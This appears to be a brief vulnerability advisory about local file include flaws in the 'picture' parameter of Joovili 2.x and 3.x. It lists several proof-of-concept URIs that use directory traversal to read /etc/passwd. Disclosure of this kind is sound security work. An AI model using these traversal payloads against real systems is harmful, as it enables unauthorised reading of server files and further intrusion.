|
Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities
An attacker can exploit this issue with a browser. The following proof-of-concept URIs are available: Joovili 2.x: http://www.example.com/include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE http://www.example.com/include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE Joovili 3.x: http://www.example.com/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE http://www.example.com/joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE |
|
|
Privacy Statement |